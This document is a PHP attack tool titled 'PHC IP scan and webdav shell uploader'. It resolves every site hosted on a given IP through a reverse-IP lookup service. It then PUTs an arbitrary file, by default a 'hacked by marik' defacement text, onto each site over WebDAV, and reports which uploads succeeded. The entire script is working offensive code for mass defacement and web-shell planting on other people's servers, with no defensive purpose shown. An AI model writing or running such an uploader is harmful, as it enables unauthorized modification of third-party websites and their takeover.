Webdavscan2

1. <center><font style="font-size:40px">PHC IP scan and webdav shell uploader</font><br /><br />
2.  
3. <?php
4. set_time_limit(0);
5. error_reporting(0);
6.  
7. echo '<form action="" method="post">
8.        Filename:<input name="nam" value="mav.txt"><br />
9.        Text:<br />
10.        <textarea name="isi" cols="50" rows="30">hacked by marik</textarea><br />
11.        Scan ip:<br />
12.        <input name="wd" value="60.172.12.2"><br />
13.        <input type="submit">
14.        </form>';
15.  
16.  
17.  
18. $filename = $_POST["nam"];
19. $ip = $_POST["wd"];
20. $isi = $_POST["isi"];
21. $ua = $_SERVER["HTTP_USER_AGENT"];
22.  
23.  
24. $kl = curl_init('http://www.ip-adress.com/reverse_ip/'.$ip);
25. $kla = array(
26.                    CURLOPT_RETURNTRANSFER => 1,
27.                    CURLOPT_USERAGENT => $ua);
28.          curl_setopt_array($kl, $kla);
29.          $html = curl_exec($kl);
30.                   curl_close($kl);
31.  
32. function getek($tag, $html, $strict=0)
33. {
34.    
35.     $dom = new domDocument;
36.  
37.    
38.     if($strict==1)
39.     {
40.         $dom->loadXML($html);
41.     }
42.     else
43.     {
44.         $dom->loadHTML($html);
45.      }
46.     $dom->preserveWhiteSpace = false;
47.  
48.    
49.     $content = $dom->getElementsByTagname($tag);
50.     $out = array();
51.     foreach ($content as $item)
52.     {
53.        
54.         $out[] = $item->nodeValue;
55.     }
56.    
57.     return $out;
58. }
59.  
60.  $haha = getek("td", $html);
61.  
62. foreach($haha as $jojo)
63. {
64. $phc = trim($jojo);
65. $naru = curl_init("http://".$phc);
66.          curl_setopt($naru, CURLOPT_RETURNTRANSFER, 1);
67.          $betol = curl_exec($naru);
68.           curl_close($naru);
69.  
70.     if($betol === false)
71.       {
72.        
73.       }
74.      else
75.      {
76.      
77.  
78. //script webdav mula
79.  
80. $taz = fopen("sementara.phc", "w+");
81.           fwrite($taz, $isi);
82.           fclose($taz);
83.  
84.  
85.  
86.  
87.  
88. // Prepare the file we are going to upload
89. $filepath = "sementara.phc";
90. $filesize = filesize($filepath);
91. $fh = fopen($filepath, 'r');
92.  
93.  
94.    
95.  
96.  
97.  
98. // The URL where we will upload to, this should be the exact path where the file
99. // is going to be placed
100. $remoteUrl = $phc;
101.  
102.  
103. // Initialize cURL and set the options required for the upload. We use the remote
104. // path we specified together with the filename. This will be the result of the
105. // upload.
106. $ch = curl_init($remoteUrl ."/". $filename);
107.  
108. // I'm setting each option individually so it's easier to debug them when
109. // something goes wrong. When your configuration is done and working well
110. // you can choose to use curl_setopt_array() instead.
111.  
112. // Set the authentication mode and login credentials
113. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
114.  
115.  
116. // Define that we are going to upload a file, by setting CURLOPT_PUT we are
117. // forced to set CURLOPT_INFILE and CURLOPT_INFILESIZE as well.
118. curl_setopt($ch, CURLOPT_PUT, true);
119. curl_setopt($ch, CURLOPT_INFILE, $fh);
120. curl_setopt($ch, CURLOPT_INFILESIZE, $filesize);
121. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
122. // Execute the request, upload the file
123. $cek = curl_exec($ch);
124.            curl_close($ch);
125. if($ip != null)
126.  {
127.    $cu = curl_init("http://".$phc."/".$filename);
128.             curl_setopt($cu, CURLOPT_RETURNTRANSFER, true);
129.             $res = curl_exec($cu);
130.                        curl_close($cu);
131.    
132.  
133.    $che = strripos($res, "403");
134.    $che2 = strripos($res, "404");
135.    $che3 = strripos($res, "method not allowed");
136.    $che4 = strripos($res, "404");
137.    $che5 = strripos($res, "Not found");
138.  
139.   if($che or $che2 or $che3 or $che4 or $che5 > 1)
140.    {
141.     if($cek === false)
142.          {
143.            echo "<a href='http://".$phc."/".$filename."'>".$phc."/".$filename."</a>:[failed]<br />";
144.           }
145.          else
146.          {
147.  
148.                        $cr = curl_init();
149.             curl_setopt($cr, CURLOPT_URL, "http://".$phc."/".$filename);    
150.                   curl_setopt($cr, CURLOPT_RETURNTRANSFER, 1);
151.                   $respons = curl_exec($cr);
152.                       $errno = curl_errno($cr);
153.                       $error = curl_error($cr);
154.                $response = $response;
155.                         $info = curl_getinfo($cr);
156.                       $chek = $info['http_code'];
157.                         curl_close($cr);
158.  
159.    
160.                   if($chek > 400)
161.                         {
162.  
163.            echo "<a href='http://".$phc."/".$filename."'>".$phc."/".$filename."</a>:[failed]<br />";
164.                        }
165.                    else
166.                       {
167.            echo "<a href='http://".$phc."/".$filename."'>".$phc."/".$filename."</a>:[uploaded]<br />";
168.                       }
169.           }
170.     }
171.   else
172.    {
173.      echo "<a href='http://".$phc."/".$filename."'>".$phc."/".$filename."</a>:[Uploaded]<br />";
174.     }
175.  }
176.  else
177.   {
178.   }
179.  
180.  
181. // Close the file handle
182. fclose($fh);
183.      
184.      
185.    
186.  
187. //script webdav tamat
188.      }
189.    
190. }
191.  
192. ?>